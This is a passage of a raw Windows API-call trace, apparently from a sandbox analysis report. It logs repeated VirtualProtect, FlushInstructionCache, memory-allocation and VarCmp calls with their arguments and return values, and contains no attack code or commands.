flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.955] GetCurrentProcess () returned 0xffffffff [0104.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0104.955] GetCurrentProcess () returned 0xffffffff [0104.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0104.956] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.956] GetCurrentProcess () returned 0xffffffff [0104.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0104.956] GetCurrentProcess () returned 0xffffffff [0104.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0104.956] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.957] GetCurrentProcess () returned 0xffffffff [0104.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0104.957] GetCurrentProcess () returned 0xffffffff [0104.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0104.957] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.958] GetCurrentProcess () returned 0xffffffff [0104.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0104.960] GetAsyncKeyState (vKey=3) returned 0 [0104.960] GetAsyncKeyState (vKey=3) returned 0 [0104.960] CRetailMalloc_Alloc () returned 0xcbddaa8 [0104.961] memcpy (in: _Dst=0xaf5168, _Src=0x1977bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.961] memcpy (in: _Dst=0xcbddac8, _Src=0x197824, _Size=0x18 | out: _Dst=0xcbddac8) returned 0xcbddac8 [0104.961] CRetailMalloc_Realloc () returned 0xcbddaa8 [0104.961] CRetailMalloc_Free () returned 0x1 [0104.961] GetCurrentProcess () returned 0xffffffff [0104.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0104.961] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.961] GetCurrentProcess () returned 0xffffffff [0104.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0104.962] GetCurrentProcess () returned 0xffffffff [0104.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0104.962] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.962] GetCurrentProcess () returned 0xffffffff [0104.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0104.962] GetCurrentProcess () returned 0xffffffff [0104.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0104.962] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.963] GetCurrentProcess () returned 0xffffffff [0104.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0104.963] GetCurrentProcess () returned 0xffffffff [0104.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0104.963] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.964] GetCurrentProcess () returned 0xffffffff [0104.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0104.964] GetCurrentProcess () returned 0xffffffff [0104.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0104.964] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.965] GetCurrentProcess () returned 0xffffffff [0104.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0104.965] GetCurrentProcess () returned 0xffffffff [0104.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0104.965] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.966] GetCurrentProcess () returned 0xffffffff [0104.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0104.966] GetCurrentProcess () returned 0xffffffff [0104.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0104.966] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.966] GetCurrentProcess () returned 0xffffffff [0104.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0104.966] GetCurrentProcess () returned 0xffffffff [0104.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0104.966] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.967] GetCurrentProcess () returned 0xffffffff [0104.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0104.967] GetCurrentProcess () returned 0xffffffff [0104.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0104.967] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.968] GetCurrentProcess () returned 0xffffffff [0104.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0104.968] GetCurrentProcess () returned 0xffffffff [0104.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0104.968] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.969] GetCurrentProcess () returned 0xffffffff [0104.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0104.969] GetCurrentProcess () returned 0xffffffff [0104.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0104.969] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.969] GetCurrentProcess () returned 0xffffffff [0104.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0104.969] GetCurrentProcess () returned 0xffffffff [0104.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0104.970] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.970] GetCurrentProcess () returned 0xffffffff [0104.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0104.970] GetCurrentProcess () returned 0xffffffff [0104.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0104.971] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.971] GetCurrentProcess () returned 0xffffffff [0104.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0104.971] GetCurrentProcess () returned 0xffffffff [0104.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0104.971] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.972] GetCurrentProcess () returned 0xffffffff [0104.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0104.972] GetCurrentProcess () returned 0xffffffff [0104.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0104.972] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.972] GetCurrentProcess () returned 0xffffffff [0104.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0104.972] GetCurrentProcess () returned 0xffffffff [0104.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0104.973] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.973] GetCurrentProcess () returned 0xffffffff [0104.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0104.973] GetCurrentProcess () returned 0xffffffff [0104.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0104.973] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.974] GetCurrentProcess () returned 0xffffffff [0104.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0104.974] GetCurrentProcess () returned 0xffffffff [0104.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0104.974] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.975] GetCurrentProcess () returned 0xffffffff [0104.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0104.975] GetCurrentProcess () returned 0xffffffff [0104.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0104.975] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.975] GetCurrentProcess () returned 0xffffffff [0104.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0104.975] GetCurrentProcess () returned 0xffffffff [0104.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0104.975] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.976] GetCurrentProcess () returned 0xffffffff [0104.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0104.976] GetCurrentProcess () returned 0xffffffff [0104.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0104.976] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.977] GetCurrentProcess () returned 0xffffffff [0104.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0104.977] GetCurrentProcess () returned 0xffffffff [0104.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0104.977] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.977] GetCurrentProcess () returned 0xffffffff [0104.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0104.977] GetCurrentProcess () returned 0xffffffff [0104.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0104.977] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.978] GetCurrentProcess () returned 0xffffffff [0104.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0104.979] GetCurrentProcess () returned 0xffffffff [0104.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0104.979] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0104.979] GetCurrentProcess () returned 0xffffffff [0104.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0104.979] GetCurrentProcess () returned 0xffffffff [0104.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0104.979] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.030] GetCurrentProcess () returned 0xffffffff [0105.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.030] GetCurrentProcess () returned 0xffffffff [0105.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.030] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.030] GetCurrentProcess () returned 0xffffffff [0105.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.030] GetCurrentProcess () returned 0xffffffff [0105.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.031] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.031] GetCurrentProcess () returned 0xffffffff [0105.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.031] GetCurrentProcess () returned 0xffffffff [0105.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.031] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.032] GetCurrentProcess () returned 0xffffffff [0105.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.032] GetCurrentProcess () returned 0xffffffff [0105.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.032] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.032] GetCurrentProcess () returned 0xffffffff [0105.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.032] GetCurrentProcess () returned 0xffffffff [0105.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.032] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.033] GetCurrentProcess () returned 0xffffffff [0105.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.033] GetCurrentProcess () returned 0xffffffff [0105.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.033] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0105.033] GetCurrentProcess () returned 0xffffffff [0105.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.034] GetAsyncKeyState (vKey=3) returned 0 [0105.034] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.034] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.034] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.034] CRetailMalloc_Alloc () returned 0xcbddb08 [0105.034] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.035] memcpy (in: _Dst=0xcbddb28, _Src=0x197724, _Size=0x18 | out: _Dst=0xcbddb28) returned 0xcbddb28 [0105.035] CRetailMalloc_Realloc () returned 0xcbddb08 [0105.035] CRetailMalloc_Free () returned 0x1 [0105.035] GetCurrentProcess () returned 0xffffffff [0105.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.035] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.035] GetCurrentProcess () returned 0xffffffff [0105.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.035] GetCurrentProcess () returned 0xffffffff [0105.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.035] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.036] GetCurrentProcess () returned 0xffffffff [0105.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.036] GetCurrentProcess () returned 0xffffffff [0105.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.036] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.036] GetCurrentProcess () returned 0xffffffff [0105.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.036] GetCurrentProcess () returned 0xffffffff [0105.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.037] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.037] GetCurrentProcess () returned 0xffffffff [0105.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.037] GetCurrentProcess () returned 0xffffffff [0105.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.037] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.038] GetCurrentProcess () returned 0xffffffff [0105.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.038] GetCurrentProcess () returned 0xffffffff [0105.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.038] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.038] GetCurrentProcess () returned 0xffffffff [0105.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.038] GetCurrentProcess () returned 0xffffffff [0105.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.038] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.039] GetCurrentProcess () returned 0xffffffff [0105.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.039] GetCurrentProcess () returned 0xffffffff [0105.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.039] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.039] GetCurrentProcess () returned 0xffffffff [0105.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.039] GetCurrentProcess () returned 0xffffffff [0105.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.039] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.040] GetCurrentProcess () returned 0xffffffff [0105.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.040] GetCurrentProcess () returned 0xffffffff [0105.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.040] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.040] GetCurrentProcess () returned 0xffffffff [0105.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.040] GetCurrentProcess () returned 0xffffffff [0105.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.040] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.041] GetCurrentProcess () returned 0xffffffff [0105.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.041] GetCurrentProcess () returned 0xffffffff [0105.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.041] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.041] GetCurrentProcess () returned 0xffffffff [0105.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.041] GetCurrentProcess () returned 0xffffffff [0105.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.041] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.042] GetCurrentProcess () returned 0xffffffff [0105.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.042] GetCurrentProcess () returned 0xffffffff [0105.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.042] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.043] GetCurrentProcess () returned 0xffffffff [0105.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.043] GetCurrentProcess () returned 0xffffffff [0105.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.043] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.043] GetCurrentProcess () returned 0xffffffff [0105.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.044] GetCurrentProcess () returned 0xffffffff [0105.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.044] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.044] GetCurrentProcess () returned 0xffffffff [0105.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.044] GetCurrentProcess () returned 0xffffffff [0105.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.044] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.045] GetCurrentProcess () returned 0xffffffff [0105.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.045] GetCurrentProcess () returned 0xffffffff [0105.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.045] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.045] GetCurrentProcess () returned 0xffffffff [0105.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.045] GetCurrentProcess () returned 0xffffffff [0105.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.045] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.046] GetCurrentProcess () returned 0xffffffff [0105.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.046] GetCurrentProcess () returned 0xffffffff [0105.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, 